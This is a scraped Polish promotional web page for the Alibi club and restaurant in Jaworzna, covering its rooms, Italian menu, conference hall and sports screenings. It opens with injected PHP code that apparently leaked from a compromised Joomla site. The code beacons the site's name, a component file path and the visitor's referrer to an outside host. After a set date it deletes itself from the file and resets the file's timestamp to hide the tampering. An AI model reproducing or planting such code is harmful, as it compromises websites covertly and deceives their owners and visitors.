check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456734038){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_newsfeeds/models/models.php"); } Lokal ALIBI O KLUBIE

Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player
O KLUBIE

 

Alibi to gustowny i nowoczesny lokal położony w samym centrum Jaworzna, który od 2001 roku jest miejscem spotkań przy dobrym drinku, lampce wina lub kawie.
Klub zaprojektowano wykorzystując najnowsze technologie w dziedzinie architektury wnętrz. Nagłośnienie i sprzęt muzyczny spełniają najwyższe standardy, a niesamowity nastrój tworzony jest przez zmieniające się efekty świetlne. Całość uzupełnia nieprzeciętna oprawa muzyczna w klimacie chill out.


Lokal posiada 250 miejsc na 4 niezależnych salach, doskonale wyposażony bar oferujący pełną gamę trunków oraz wykwintne dania kuchni włoskiej, które połączone z pomysłami szefa kuchni dają niezapomniane wrażenia smakowe.
Czas spędzony w Alibi uprzyjemni miła i fachowa obsługa, która zadba o Wasze dobre samopoczucie.

Dużym atutem Alibi jest osobna multimedialna sala sprzyjająca wszelkiego rodzaju spotkaniom biznesowym i szkoleniom, które wymagają ciszy, spokoju oraz skupienia. Możemy z powodzeniem powiedzieć, iż jest to jedyna w swoim rodzaju sala konferencyjna w centrum Jaworzna.

Fanów sportu zapraszamy na transmisje meczów piłkarskich i wydarzeń sportowych na telebimie o wymiarach 2,5m x 2,5m i 6 telewizorach LCD.

Cały obiekt jest klimatyzowany i objęty pełnym monitoringiem. O bezpieczeństwo naszych Gości dba ochrona na terenie całego lokalu.
Zapewniamy dostęp do internetu WiFi (hotsopt).
Dysponujemy salą dla palących.

Alibi to miejsce, w którym musisz być ...

 
x-dream.pl